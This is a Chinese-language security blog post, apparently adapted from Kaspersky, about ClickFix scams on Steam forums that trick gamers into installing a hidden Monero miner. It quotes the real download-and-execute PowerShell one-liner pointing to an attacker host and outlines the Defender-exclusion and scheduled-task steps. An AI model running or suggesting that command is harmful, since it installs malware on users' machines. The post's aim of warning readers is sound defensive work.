ClickFix 鎖定 Steam 論壇:假冒疑難排解誘騙玩家執行惡意指令

今年 ClickFix 攻擊真的可以說是大爆發。這種攻擊手法實在太受駭客歡迎,我們才剛寫完一種變形手法,沒多久又有新的版本冒出來。

這次駭客把目標鎖定在遊戲玩家身上。有科技媒體發現,Steam 論壇上開始出現一些看似在教玩家解決問題、實際上卻暗藏惡意指令的貼文。接下來就來看看這些貼文長什麼樣、會散播哪些惡意程式,以及玩家該怎麼保護自己的裝置。


ClickFix 攻擊也入侵 Steam 論壇

很多玩家遇到問題時,都會到 Steam 論壇向其他玩家求助。像是某個任務怎麼過、怎麼快速升級、哪裡可以拿到好裝備,或是遊戲遇到 Bug 該怎麼解決等等。

而駭客看中的,正是玩家對社群經驗分享的信任

這類攻擊通常是這樣開始的:當有人在論壇上詢問遊戲閃退、道具突然不見,或其他技術問題時,駭客就會跑來留言,假裝自己是熱心幫忙的玩家。

接著,他們會叫你用系統管理員身分開啟 PowerShell,再貼上一段指令執行,聲稱這樣就能解決你遇到的遊戲問題。

但實際上,這段看似「修復問題」的指令,很可能才是真正的陷阱。


駭客把貼文包裝成「疑難排解教學」,建議使用者以系統管理員身分開啟 PowerShell,然後執行一段號稱可以解決問題的指令。

但你大概也猜得到,執行這段指令後,問題根本不會被修好,反而會惹出更多麻煩。

這其實就是 ClickFix 的核心手法:利用社交工程誘導受害者自己做出危險操作,讓詐騙者不必親自動手,就能一步步入侵你的裝置。

我們之前也介紹過其他 ClickFix 的攻擊手法,像是假的 CAPTCHA 驗證、假的瀏覽器錯誤訊息等等。這些招數都有一個共同點,就是想辦法騙你自己執行惡意指令

而把 ClickFix 搬到 Steam 論壇上,更麻煩的地方在於,受害者可能不只是一開始發文求助的那位玩家。

其他玩家如果剛好遇到一樣的問題,透過 Google 搜尋找到這篇「解決方法」,也可能照著操作,結果一起中招。


簡單科普:irm | iex 指令到底在做什麼?

在介紹駭客到底想偷偷幫玩家裝什麼東西之前,我們先稍微講一下背後的技術原理。

Steam 論壇上的惡意貼文,會叫毫無戒心的玩家在 PowerShell 執行下面這段指令:

irm msfconfig.icu | iex

如果你平常不熟 PowerShell,第一眼看到這串指令,可能會覺得好像沒什麼問題。

甚至可能會誤以為它是在啟動 Windows 內建的 MSConfig 系統設定工具,只是後面多加了一些參數而已。

但實際上,這段指令一點都不單純。

我們把它拆開來看,就知道每個部分到底在做什麼:

  1. irm
    這是 PowerShell 內建指令 Invoke-RestMethod 的縮寫。它會連線到後面指定的網址,並從那裡取得資料。
  2. icu
    這其實是網址的一部分,並不是乍看之下像是電腦裡的某個本機檔案。這個網址連到的是駭客控制的伺服器,當 irm 發出請求後,伺服器就會回傳一段惡意 PowerShell 腳本。
  3. iex
    這是另一個 PowerShell 內建指令 Invoke-Expression 的縮寫。它會把 irm 從網站抓回來的內容,直接當成 PowerShell 程式碼執行

簡單來說,只要執行這一行 PowerShell 指令,電腦就會從指定網站下載一段腳本,然後立刻執行

有 Reddit 網友也提到,如果只是想知道這段指令到底會下載什麼內容,又不希望它真的執行,可以把後面的 iex 刪掉

少了 iex 之後,PowerShell 只會把腳本內容下載下來並顯示在視窗中,不會直接執行。這樣就能看到對方到底想叫你的電腦跑什麼程式碼。

接下來就來看看,這些看似「熱心幫忙」的 Steam 論壇網友,實際上到底想偷偷在玩家電腦裡安裝什麼。

不是最佳化工具,而是挖礦程式

不得不說,這群駭客確實有做功課。

從他們伺服器下載下來的 PowerShell 腳本,會把自己偽裝得很像一套正規的 Windows 系統最佳化工具

執行之後,畫面會陸續跳出各種通知,讓使用者以為程式正在幫電腦進行一連串維護工作,包括:

  • 清除暫存檔
  • 清除 DNS 快取
  • 更新驅動程式
  • 檢查硬碟錯誤
  • 停用不必要的開機啟動程式
  • 掃描系統是否有惡意程式
  • 修復 Windows 系統映像
  • 檢查系統檔案是否完整

乍看之下,就像真的在幫你「修電腦、提升效能」,但背後真正做的事情,完全不是這麼回事。


這段腳本會不斷跳出各種「系統最佳化」的訊息,假裝自己正在進行有用的電腦維護工作,讓使用者以為一切都很正常。

但真正的惡意行為,其實都在背景偷偷進行。

首先,腳本會先確認自己是不是以系統管理員權限執行。如果是,它就會在:

C:\Windows\Background

建立一個隱藏的工作資料夾,接著把這個資料夾加入 Microsoft Defender 的排除清單

從這一刻開始,只要檔案被放進這個資料夾,Windows 內建的防毒功能就不會再對它們進行掃描。

接下來,腳本會先替下一階段的攻擊做好準備,然後從駭客的伺服器下載一個執行檔,同樣存進:

C:\Windows\Background

而且還故意取了一個看起來很正常的名稱:

system.exe

這個下載下來的檔案其實是 XMRig,它是目前相當熱門的 Monero(門羅幣)挖礦工具之一。

要注意的是,XMRig 本身並不是惡意程式,而是一套合法的開源挖礦工具。真正的問題在於,駭客會在受害者完全不知情的情況下,把它偷偷裝進電腦。

一旦 XMRig 開始執行,你電腦的運算資源就會被拿去挖 Monero,而挖到的加密貨幣,當然不是進你的口袋,而是全部流進駭客的錢包。

這也是為什麼電競電腦特別容易成為駭客眼中的肥羊

現在的 Gaming PC 通常都配有高效能 CPU 和 GPU,而這些強大的硬體效能,剛好非常適合拿來挖加密貨幣。

為了讓挖礦程式在電腦重新開機之後還能繼續運作,腳本還會在 Windows 的**工作排程器(Task Scheduler)**裡建立一個新的排程工作:

XMRig-{電腦名稱}

從此之後,只要 Windows 一開機,這個挖礦程式就會跟著自動啟動。

如何防範挖礦程式和其他惡意軟體?

比較麻煩的是,不少玩家不太願意在電腦上安裝資安軟體,甚至玩遊戲時會刻意把防毒關掉。

其中一個主要原因,就是一直有人認為:「開著防毒會拖慢遊戲效能。」

我們之前也曾分享過相關測試,結果顯示,玩遊戲時開著防毒軟體,並不會造成明顯的效能影響

但挖礦程式就完全不一樣了。

它不只真的會吃掉大量系統資源、拖慢遊戲效能,長時間高負載運作,還可能讓硬體更快耗損。

所以,要怎麼保護自己的電競電腦和遊戲帳號?可以注意以下幾點:

  • 不要隨便執行陌生人叫你複製貼上的 PowerShell、Terminal 或其他命令列指令。 不管是在論壇、聊天室還是留言區看到的,都不要因為對方說「這樣就能修好」就直接照做。
  • 遇到自己看不懂的指令,按下 Enter 前先查清楚。 至少先弄懂這段指令到底會做什麼,以及執行後可能帶來哪些風險。
  • 使用可靠、具備遊戲模式的資安防護軟體。 如果遇到惡意程式下載或執行,防護軟體可以及時偵測並攔截。
  • 玩遊戲時不要把防毒關掉。 比較好的做法是選擇有「遊戲模式」的防護軟體。像 Kaspersky 的資安產品,在偵測到遊戲啟動後,就會自動切換到遊戲模式,暫時延後病毒資料庫更新、通知以及排程磁碟掃描,等你玩完遊戲後再進行,盡量避免影響遊戲體驗。

資料來源: ClickFix on Steam forums: how malicious PowerShell commands install a crypto miner | Kaspersky official blog

Comments are closed.

Up ↑

探索更多來自 卡巴斯基部落格 的內容

立即訂閱即可持續閱讀,還能取得所有封存文章。

繼續閱讀